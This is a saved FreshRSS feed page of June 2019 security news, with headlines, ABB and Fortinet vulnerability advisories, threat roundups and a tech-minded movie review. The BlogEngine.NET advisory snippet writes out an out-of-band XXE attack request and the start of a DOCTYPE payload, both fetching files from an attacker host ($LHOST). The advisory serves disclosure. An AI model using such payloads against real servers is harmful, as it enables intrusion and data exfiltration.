FreshRSS

Today — June 24th 2019 · Your RSS feeds

Iran Targeting U.S. With Destructive Wipers, Warns DHS

By Lindsey O'Donnell
The Department of Homeland Security is warning that U.S. agencies are being targeted by Iranian-backed cyberattacks with destructive wiper malware.

Mozilla patched two Firefox zero-day flaws in one week

By John E Dunn
Two emergency zero-days affecting a browser in one week count as unusual - especially when they pop up as separate alerts two days apart.

Mobile apps riddled with high-risk vulnerabilities, warns report

By Danny Bradbury
Be careful before installing that mobile app on your iOS or Android device - many mobile applications are riddled with vulnerabilities.

Desjardins’ employee from hell spills 2.9m records

By Lisa Vaas
The leak, carried out by a since-fired rogue employee, affected 2.7 million people and 173,000 businesses - about 41% of its clientele.

Facebook posts reveal your hidden illnesses, say researchers

By Lisa Vaas
The language we use could be indicators of disease and, with patient consent, could be monitored just like physical symptoms.

He Cyberstalked Teen Girls for Years—Then They Fought Back

By Stephanie Clifford
How a hacker shamed and humiliated high school girls in a small New Hampshire town, and how they helped take him down.

The Internet Has Made Dupes—and Cynics—of Us All

By Zeynep Tufekci
The typical response to the onslaught of falsehood is to say, lol, nothing matters. But when so many of us are reaching this point, it really does matter.

Cisco cleans up critical flaws, Florida city forks out $600k to ransomware scumbags, and more from infosec land

Your quick guide to what else has been happening in computer security lately

Roundup: Here's a quick Monday summary of recent infosec news, beyond what we've already reported.…

  • June 24th 2019 at 09:56

Monday review – the hot 20 stories of the week

By Naked Security writer
From Bella Thorne publishing her own nudes to the Yubikey recall - and everything in between. It's weekly roundup time.

Driving Xtreme Cuts: DXC Technology waves bye bye to 45% of Americas Security division

50 roles shifted off to India

DXC Technology is sending hundreds of security personnel from the Americas division down the redundancy chute and offshoring some of those roles to low-cost centres, insiders are telling us.…

  • June 24th 2019 at 08:08

XL-19-008 - ABB IDAL FTP Server Path Traversal Vulnerability

Posted by xen1thLabs on Jun 24

XL-19-008 - ABB IDAL FTP Server Path Traversal Vulnerability
========================================================================

Identifiers
-----------
XL-19-008
CVE-2019-7227
ABBVU-IAMF-1902006

CVSS Score
----------
7.3 (AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL FTP server fails...
  • June 24th 2019 at 07:06

XL-19-012 - ABB IDAL HTTP Server Uncontrolled Format String Vulnerability

Posted by xen1thLabs on Jun 24

XL-19-012 - ABB IDAL HTTP Server Uncontrolled Format String Vulnerability
========================================================================

Identifiers
-----------
XL-19-012
CVE-2019-7228
ABBVU-IAMF-1902007

CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL HTTP...
  • June 24th 2019 at 07:06

XL-19-009 - ABB HMI Hardcoded Credentials Vulnerability

Posted by xen1thLabs on Jun 24

XL-19-009 - ABB HMI Hardcoded Credentials Vulnerability
========================================================================

Identifiers
-----------
XL-19-009
CVE-2019-7225
ABBVU-IAMF-1902004
ABBVU-IAMF-1902011
ABBVU-IAMF-1902002

CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
xen1thLabs - Software Labs

Vulnerability summary
---------------------
The affected...
  • June 24th 2019 at 07:06

XL-19-004 - ABB IDAL FTP Server Uncontrolled Format String Vulnerability

Posted by xen1thLabs on Jun 24

XL-19-004 - ABB IDAL FTP Server Uncontrolled Format String Vulnerability
========================================================================

Identifiers
-----------
XL-19-004
CVE-2019-7230
ABBVU-IAMF-1902008

CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL FTP...
  • June 24th 2019 at 07:06

XL-19-010 - ABB IDAL HTTP Server Authentication Bypass Vulnerability

Posted by xen1thLabs on Jun 24

XL-19-010 - ABB IDAL HTTP Server Authentication Bypass Vulnerability
========================================================================

Identifiers
-----------
XL-19-010
CVE-2019-7226
ABBVU-IAMF-1902005

CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL HTTP...
  • June 24th 2019 at 07:06

XL-19-005 - ABB HMI Absence of Signature Verification Vulnerability

Posted by xen1thLabs on Jun 24

XL-19-005 - ABB HMI Absence of Signature Verification Vulnerability
========================================================================

Identifiers
-----------
XL-19-005
CVE-2019-7229
ABBVU-IAMF-1902003
ABBVU-IAMF-1902012

CVSS Score
----------
8.3 (AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
xen1thLabs - Software Labs

Vulnerability summary
---------------------
ABB HMI uses two...
  • June 24th 2019 at 07:06

XL-19-011 - ABB IDAL HTTP Server Stack-Based Buffer Overflow Vulnerability

Posted by xen1thLabs on Jun 24

XL-19-011 - ABB IDAL HTTP Server Stack-Based Buffer Overflow Vulnerability
========================================================================

Identifiers
-----------
XL-19-011
CVE-2019-7232
ABBVU-IAMF-1902009

CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL HTTP...
  • June 24th 2019 at 07:06

XL-19-007 - ABB IDAL FTP Server Buffer Overflow Vulnerability

Posted by xen1thLabs on Jun 24

XL-19-007 - ABB IDAL FTP Server Buffer Overflow Vulnerability
========================================================================

Identifiers
-----------
XL-19-007
CVE-2019-7231
ABBVU-IAMF-1902010

CVSS Score
----------
6.5 (AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
Eldar Marcussen - xen1thLabs - Software Labs

Vulnerability summary
---------------------
The IDAL FTP server is...
  • June 24th 2019 at 07:06

APPLE-SA-2019-6-20-1 AirPort Base Station Firmware Update 7.8.1

Posted by Apple Product Security via Fulldisclosure on Jun 24

APPLE-SA-2019-6-20-1 AirPort Base Station Firmware Update 7.8.1

AirPort Base Station Firmware Update 7.8.1 is now available and
addresses the following:

AirPort Base Station Firmware
Available for: AirPort Express, AirPort Extreme, and AirPort Time
Capsule base stations with 802.11n
Impact: A remote attacker may be able to leak memory
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8581: Lucio Albornoz...
  • June 24th 2019 at 07:06

XL-19-006 - ABB HMI Outdated Software Components

Posted by xen1thLabs on Jun 24

XL-19-006 - ABB HMI Outdated Software Components
========================================================================

Identifiers
-----------
XL-19-006
ABBVU-IAMF-1902001
ABBVU-IAMF-1902010

CVSS Score
----------
7.1 (AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L)

Affected vendor
---------------
ABB (new.abb.com)

Credit
------
xen1thLabs - Software Labs

Vulnerability summary
---------------------
ABB HMI uses outdated software components that are...
  • June 24th 2019 at 07:06

Fortinet FortiCam FCM-MB40 Vulnerabilities

Posted by XORcat on Jun 24

Original posting: https://xor.cat/2019/06/19/fortinet-forticam-vulns/

## Background

In March of 2019 I discovered five vulnerabilities in Fortinet's
FortiCam FCM-MB40[1] product.

Part-way through disclosing this vulnerability, I discovered that the
FCM-MB40 is manufactured by a company called Dynacolor Inc[2], which
calls the product "Q2-H"[3].

The FortiCam FCM-MB40 software version which I found these
vulnerabilities in was...
  • June 24th 2019 at 07:06

Re: Multiple Cross-site Scripting Vulnerabilities in Shopware 5.5.6

Posted by Henri Salo on Jun 24

Please use CVE-2019-12935 for this vulnerability.
  • June 24th 2019 at 07:04

Quarking Password Manager 3.1.84 - Clickjacking Vulnerability

Posted by gionreale on Jun 24

Quarking Password Manager 3.1.84 suffers from a clickjacking
vulnerability caused by allowing * within web_accessible_resources. An
attacker can take advantage of this vulnerability and cause significant
harm.

CVE-2019-12880
  • June 24th 2019 at 07:04

BlogEngine.Net XXE issues

Posted by aaron bishop on Jun 24

BlogEngine.NET, versions 3.3.7 and earlier, are vulnerable to an
Out-of-band XXE attack through syndication.axd and pingback.axd.

*syndication.axd* accepts an external XML as the value for apml through a
request such as:

http://$RHOST/blog/syndication.axd?apml=http://$LHOST/oob.xml

*pingback.axd* will parse a POST with an XML body, such as:

<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://$LHOST/ex.dtd"...
  • June 24th 2019 at 07:03

DoH! Will the new protocol change how infosec professionals work

By Jeff Peters

Andrew Wertkin, CTO of BlueCat Networks, returns to the podcast to discuss a new and hotly contested privacy technology called DNS over HTTPS (DoH), the ethical and procedural issues around DoH, and how it may change the way infosec professionals work. In the podcast, Wertkin and host Chris Sienko discuss: – Can you explain DNS […]

The post DoH! Will the new protocol change how infosec professionals work appeared first on Infosec Resources.

DoH! Will the new protocol change how infosec professionals work was first posted on June 24, 2019 at 2:00 am.

Hackers Used Two Firefox Zero Days to Hit a Crypto Exchange

By Emily Dreyfuss
A ransomware haul, a border security leak, and more of the week's top security news.

Mass Appeal - Paul's Security Weekly #609

By paul@securityweekly.com

This week, we welcome Vivek Ramachandran, Founder and CEO of the Pentester Academy, to talk about their AttackDefense Labs platform, and how the Pentester Academy is helping thousands of customers from government agencies to Fortune 500 companies! In the second segment, we welcome back Bryson Bort, Founder and CEO of Scythe, to talk about purple teaming, top attack simulation scenarios, and testing command and control channels! In the Security News, how not to prevent a cyberwar with Russia, the case against knee-jerk installation of Windows patches, U.S. Customs and Border Protection data breach is the result of a supply chain attack, and a phishing scam that hacks two-factor authentication!

To learn more about SCYTHE, visit: https://securityweekly.com/scythe

Full Show Notes: https://wiki.securityweekly.com/Episode609

Visit https://www.securityweekly.com/psw for all the latest episodes!

Visit https://securityweekly.com/acm to sign up for a demo or buy our AI Hunter!

Follow us on Twitter: https://www.twitter.com/securityweekly

Like us on Facebook: https://www.facebook.com/secweekly

  • June 22nd 2019 at 09:00

PC-Doctor Toolbox before 7.3 has an Uncontrolled Search Path Element

Posted by Micah Wiseley on Jun 21

Full Disclosure

I. VULNERABILITY
-------------------------
Uncontrolled search path element vulnerability in PC-Doctor Toolbox prior
to version 7.3 allows local users to gain privileges and conduct DLL
hijacking attacks via a trojan horse DLL located in an unsecured directory
which has been added to the PATH environment variable.

II. CVE REFERENCE
-------------------------
CVE-2019-12280

III. VENDOR
-------------------------
PC-Doctor, Inc....
  • June 21st 2019 at 22:49

Political Clout - Enterprise Security Weekly #142

By paul@securityweekly.com

This week, we welcome Bryan Warren, President and Chief Consultant at WarSec Security, to talk about the Challenges of Healthcare Security! In our second segment, we'll talk about the challenges of inheriting someone else's code! In the Enterprise News, Docker desktop for Windows 10 will soon switch to WSL 2, Netskope introduces Zero-Trust secure access to private enterprise applications, 10 notable security acquisitions of 2019, and can your patching strategy keep up with the demands of open source?

Full Show Notes: https://wiki.securityweekly.com/ES_Episode142

Visit https://www.securityweekly.com/esw for all the latest episodes!

  • June 21st 2019 at 21:00

Cop Gets $585K After Colleagues Snooped on Her DMV Data

By Louise Matsakis
A jury this week finds that Minneapolis police officers abused their license database access. Dozens of other lawsuits have made similar claims.

Podcast: Dating App Privacy and NASA Cyberattack

By Lindsey O'Donnell
The Threatpost team discusses the top news of the week - from a NASA cyberincident to dating app privacy issues.

This Week in Security News: Cyberespionage Campaigns and Botnet Malware

By Jon Clay (Global Threat Communications)

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about a cyberespionage campaign targeting Middle Eastern countries and a botnet malware that infiltrates containers via exposed Docker APIs.

Read on:

Hackers Are After Your Personal Data – Here’s How to Stop Them

The latest FBI Internet Crime Complaint Center (IC3) report paints an accurate picture of the scale of online threats and shows that consumers need to take urgent steps to protect their most sensitive identity and financial data from online attackers.

Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East

Trend Micro uncovered a cyberespionage campaign targeting Middle Eastern countries and named it “Bouncing Golf” based on the malware’s code in the package named “golf.” 

Trend Micro Partners with VIVOTEK to Enhance IP Cameras Security

Trend Micro announced it has blocked 5 million attempted cyberattacks against IP cameras in just five months. Through its strategic partnership with VIVOTEK, Trend Micro’s IoT security solutions are embedded in globally deployed IP cameras to provide superior protection.

AESDDoS Botnet Malware Infiltrates Containers via Exposed Docker APIs

Trend Micro details an attack type where an API misconfiguration in the open-source version of the popular DevOps tool Docker Engine-Community allows attackers to infiltrate containers and run a variant of the Linux botnet malware AESDDoS.

Ransomware Repercussions: Baltimore County Sewer Charges, 2 Medical Services Temporarily Suspended

A ransomware attack in May prevented the Baltimore City and County governments from mailing the annual water and sewage tax bills to its residents due to unverifiable accounts of abnormally low or no water consumption in 2018. 

Hackers Have Carried Out 12 Billion Attacks Against Gaming Sites in 17 Months

Hackers have targeted the gaming industry by carrying out 12 billion credential stuffing attacks against gaming websites in 17 months, according to a new report by internet delivery and cloud services company Akamai. 

Critical Linux and FreeBSD Vulnerabilities Found by Netflix, Including One That Induces Kernel Panic

A Netflix researcher uncovered four critical vulnerabilities within the TCP implementations on Linux and FreeBSD kernels that are related to the minimum segment size (MSS) and TCP Selective Acknowledgement (SACK) capabilities. 

New Oracle WebLogic Zero-day Vulnerability Allows Remote Attacks Without Authentication

Oracle published an out-of-band security alert advisory on CVE-2019-2729, a zero-day deserialization vulnerability that could allow remote attackers to execute arbitrary code on targeted servers.

Xenotime, Hacking Group Behind Triton, Found Probing Industrial Control Systems of Power Grids in the US

The hacking group, Xenotime, behind intrusions targeting facilities in oil and gas industries has started probing industrial control systems (ICSs) of power grids in the U.S. and the Asia-Pacific region, researchers reported.

Data Breach Forces Medical Debt Collector AMCA to File for Bankruptcy Protection

US medical bill and debt collector American Medical Collection Agency (AMCA) has filed for bankruptcy protection in the aftermath of a disastrous data breach that resulted in the theft of information from clients including Quest Diagnostics, LabCorp, BioReference Laboratories and more.

Cryptocurrency Mining Botnet Arrives Through ADB and Spreads Through SSH

Trend Micro observed a new cryptocurrency mining botnet that arrives via open ADB (Android Debug Bridge) ports and can spread from an infected host to any system that has had a previous SSH connection with the host.

Hacker Groups Pounce on Millions of Vulnerable Exim Servers

Multiple groups are launching attacks against exposed Exim mail servers, trying to exploit a vulnerability that could give them permanent root access.

Florida City to Pay $600K Ransom to Hacker Who Seized Computer Systems Weeks Ago

Riviera Beach is paying $600,000 in Bitcoins to a hacker who took over local government computers after an employee clicked on a malicious email link three weeks ago.

Are you up-to-date on the best ways to lower the risk of hackers accessing your personal data? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

Cyber-Risks Hiding Inside Mobile App Stores

By Kelly Sheridan, Staff Editor, Dark Reading
As the number of blacklisted apps on Google Play continues to drop, attackers find new ways to compromise smartphones.

  • June 21st 2019 at 18:15

Movie Tech Review: Child’s Play 2019

By Mark Nunnikhoven (Vice President, Cloud Research)
BETRAYED: A Trend Micro Child's Play Tech Review

A while back, Rik & Kasia Ferguson shared their thoughts on the movie, “Unfriended: The Dark Web.” The dark web and technology in general play a pivotal role in the movie’s plot, so the team decided it would be interesting to have a real-world expert review.

Everyone had a lot of fun, and thus Trend Micro movie reviews were born. I was “fortunate” enough to get the next call. The downside? The movie is, “Child’s Play” and I don’t do horror movies well.

Opening night, I powered through, watched the movie and was…pleasantly surprised?

The Movie

Was there too much gore and violence? Absolutely. However, the movie was a lot better than I expected, with an eerie performance by Mark Hamill as the voice of Chucky. Aubrey Plaza, as Karen, played her role well, which added the only real-relatable character of any depth beyond Chucky.

How does this movie rate in the horror genre? No idea. What I do know is that I enjoyed it more than I expected—which was, admittedly, a low bar—and found myself entertained for the duration.

[ Spoilers ahead : scroll down if you’re ok with that ]

Bad Training Data

Unlike the original entries in the series, this edition brings Chucky into the 21st century. Chucky is no longer a demonically possessed doll, but a blank slate in the form of a nascent AI in a robotic toy doll.

As with any AI or machine learning model, the AI starts off neutral. It requires training data in order to generate results. In Chucky’s case, he is a unique example of the “Buddi” product.

In a classic insider supply chain attack, a QA employee is fired by an overly abusive boss, but before he’s removed from the property, the employee is ordered to finish one last Buddi doll: Chucky.

This employee modifies Chucky’s code to remove any boundary checking for his core behaviours. This creates a truly unbounded, clean slate for the AI that is set out into the world.

Skipping ahead, Chucky is trained on a biased data set. This bias is the naive world view of a group of kids and their run-down neighbourhood. Chucky is exposed to crude humour, horror movies and heated emotional commentary…all without the context to process it.

This tunes the AI to generate the psychotic behaviour that fuels the rest of the movie.

IoT Insecurity

One of the features of this 21st century Buddi doll is the ability to control your smart home. Think of the doll like a walking Alexa or Google Home. Of course, there’s zero authentication or information security controls in place.

Once he’s synced with the latest update from the cloud, Chucky can simply wave his tiny finger and control the devices around him.

This leads to a number of issues around privacy (in this case, used to increase the suspense and move the plot forward) that mirror cases we’ve seen in the real world.

Third-party access to smart speakers to terrorize unsuspecting victims, remote viewing of private video streams, and manipulation of key devices, like thermostats, have all happened already in the real world, but not by rogue AIs.

…yet.

Lateral Movement

In the movie’s climax, Chucky really lets loose. He comes into his digital powers and starts to wreak havoc. Our heroes and supporting cast struggle to respond to this maniacal behaviour. The interesting point is that Chucky has developed enough as a character by this point to understand that it’s not maniacal behaviour from his perspective. To him, it’s perfectly reasonable. This underscores the fact that AI is only as good as its training data and won’t highlight bad results from a bad model.

While striving to reach his goal, Chucky—a trusted endpoint in the corporation’s services network—reaches out to all of the compatible devices within his local area.

This type of lateral movement is extremely common in today’s cyberattacks.

The movie presents the issue in an overly dramatic fashion (it is a movie after all), but the point stands up. Most technologies, IoT specifically, are generally designed with two types of endpoints: trusted and untrusted.

Security and privacy controls are then designed to prevent untrusted endpoints from accessing trusted endpoints. Trusted endpoints have little to no verification applied when communicating with each other.

In “Child’s Play”, this results in disastrous consequences. In the real world, too.

The movie is a stark—and bloody—reminder that networks and systems need visibility across all endpoints and layers and layers of security and privacy controls.

Takeaways

The way the movie leverages poor AI training, a lack of IoT security, and lateral movement techniques is intriguing, but what really caught my attention is the larger trend within the horror and suspense genre.

Films are moving away from fantasy and otherworldly villains to digital ones. That’s a reflection of how big a role technology plays in our lives, as well as the general lack of deep understanding of how it works.

For me—and the security community—that’s a big challenge: helping people understand cybersecurity and privacy in context.

If you’re looking for a fun suspense film with a technology slant, I would—shockingly—recommend watching this movie. As long as you have realistic expectations and remember that breaking most current IoT security is…child’s play.

[ 🤣Sorry, couldn’t resist ]

Four CVEs Describe SACKs of Linux and FreeBSD Vulnerabilities

By Dark Reading Staff
Four new CVEs present issues that have a potential DoS impact on almost every Linux user.

  • June 21st 2019 at 17:53

Pledges to Not Pay Ransomware Hit Reality

By Robert Lemos, Contributing Writer
While risk analysts and security experts continue to urge companies to secure systems against ransomware, they are now also advising that firms be ready to pay.

  • June 21st 2019 at 16:45

Today’s Top Public Cloud Security Threats …And How to Thwart Them

Many enterprises today have inadvertently exposed proprietary information by failing to properly secure data stored in public cloud environments like AWS, Azure, and GCP. And while cloud computing has streamlined many business processes, it can also create a security nightmare when mismanaged. A simple misconfiguration or human error can compromise the security of your organization's entire cloud environment.

Whether your whole business or small portions operate in the cloud, it’s imperative to understand the cloud-specific threats facing your organization in order to find creative and impactful solutions for remediation and protection. Let’s start by walking through the top security challenges in the cloud today to gain a better understanding of this complicated and ever-evolving landscape.

Top Security Challenges in the Cloud

Top threat: Phishing

Phishing is very popular in the cloud today. It’s often deployed using PDF decoys hosted in public cloud that arrive as email attachments and claim to have legitimate content, such as an invoice, employee directory, etc. Furthermore, since the malicious pages are stored in public cloud, they fool users into thinking that they are dealing with a legitimate entity, such as Microsoft, AWS, or Google. Once received, such content is saved to cloud storage services, like Google Drive. As soon as attachments are shared, malware can propagate within an organization, leading to cloud phishing fan out. In a matter of minutes, a legitimate user’s account can be compromised and used as part of a phishing campaign, which is far harder to detect and mitigate.

Top threat: Cryptojacking

Cryptojacking occurs when a nefarious actor uses your public cloud compute resources without your authorization. Such attacks are indifferent to device type, service, or OS, making them especially dangerous. What’s more, because such attacks usually appear to be coming from legitimate users, they often go undetected for quite some time, allowing the actors to execute a number of attacks under the radar.

A deeper understanding of these threats is critical, but it doesn’t solve the problem. So, where do we go from here? Below are my recommendations on steps for combating the above risks (and others) in the cloud.

Recommendations for Better Cloud Security

Assess Your Risk Exposure

Organizations must deploy a real-time visibility and control solution for sanctioned and unsanctioned accounts to perform continuous assessment of the security posture of these accounts and to provide visibility into what is going on with your IaaS accounts. You must also track admin activity using logging services like Amazon CloudTrail and Azure Operational Insights to gather logs about everything that is going on in an environment. Additionally, consider deploying an IaaS-ready DLP solution to prevent sensitive data loss in web-facing storage services, like AWS S3 and Azure Blob. And lastly, get real-time threat and malware detection and remediation for IaaS, SaaS, and Web. It’s imperative to continuously monitor and audit IaaS security configuration to ensure compliance with standards and best practices and to make sure that the bad guys do not slip in and fly under the radar.

Protect Sensitive Data from Insider Threats

While it sounds like common sense, many of today’s breaches occur when a user either intentionally or inadvertently shares sensitive information that compromises the security of an organization. To combat this, it’s important to educate all employees of the risks associated with doing business in the cloud. Warn users against opening untrusted attachments and executing files. Teach employees to verify the domains of links and identify common object store domains. Deploy real-time visibility and control solutions, as well as threat and malware detection solutions to monitor, detect, and remediate nefarious activity. And lastly, scan for sensitive content and apply cloud DLP policies to prevent unauthorized activity, especially from unsanctioned cloud apps. People are often the weakest link and proper training and education should be a priority for your business.

Follow Best Practices

Businesses should leverage compliance standards, such as NIST, CIS, and PCI, to easily benchmark risk and security. A lot of these tools will provide insights and recommendations for how to remediate various violations, but you should still understand that customization is key.

In order to thwart exposure, companies must have the capability to look at all cloud environments and perform assessments of how such resources are secured. And remember, every organization is different, and there is no one-size-fits-all approach to proper protection in the cloud. That said, by better understanding the threat landscape (whether within or outside your organization) and putting the proper tools in place, comprehensive cloud security is, indeed, possible.

About the author: Michael Koyfman is a Principal Global Solution Architect with Netskope. In his role, he advises Netskope customers on best practices around Netskope deployments and integrating Netskope solutions within customer environment by leveraging integration with customer technology ecosystem.

Copyright 2010 Respective Author at Infosec Island
  • June 21st 2019 at 16:02

We are security researchers at Carnegie Mellon University's Software Engineering Institute, CERT division. I'm here today with Zach Kurtz, a data scientist attempting to use machine learning techniques to detect vulnerabilities and malicious code. /r/nets

By /u/Rotem_Guttman

Zach Kurtz (Statistics Ph.D., CMU 2014) is a data scientist with Carnegie Mellon University's Software Engineering Institute, CERT Division. Zach has developed new evaluation methodologies for open-ended cyber warning competitions, built text-based classifiers, and designed cyber incident data visualization tools. Zach's experience has ranged outside of the pure cybersecurity domain, with research experience in inverse reinforcement learning, natural language processing, and deepfake detection. Zach began his data science career at the age of 14 with a school project on tagging Monarch butterflies near his childhood home in rural West Virginia.

Zach's most recent publicly available work might be of particular interest to /r/netsec subscribers.

Edit: Thank you for the questions. If you'd like to see more of our work, or have any additional questions you can contact Rotem or Zach off of our Author's pages.

Startup Raises $13.7M to Stop Breaches with Behavioral Analytics

By Dark Reading Staff
TrueFort plans to use the funding to expand sales, marketing, R&D, customer support, and go-to-market initiatives.

  • June 21st 2019 at 15:15

Threat Roundup for June 14 to June 21

By Talos Group

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between June 14 and June 21. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More >>

Reference
TRU06212019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

Patrolling the New Cybersecurity Perimeter

By Tim Brown, Vice President of Security at SolarWinds
Remote work and other developments demand a shift to managing people rather than devices.

  • June 21st 2019 at 14:00

Apply Military Strategy to Cybersecurity at Black Hat Trainings Virginia

By Black Hat Staff
This special October event in Alexandria, Virginia offers unique, practical courses in everything from data breach response to military strategy for cybersecurity.

  • June 21st 2019 at 13:00

Microsoft uses AI to push Windows 10 upgrade to users

By John E Dunn
From November, users running some versions of Windows 10 will be required to upgrade or find themselves unable to receive security updates.

Used Nest cams were letting previous owners spy on you

By Lisa Vaas
Google says it's fixed the issue, but we haven't heard details on how many, and which, products were affected.

Millions of Dell PCs Vulnerable to Flaw in Third-Party Component

By Lindsey O'Donnell
A component in SupportAssist software pre-installed on Dell PCs - and other OEM devices - opens systems up to DLL hijacking attacks.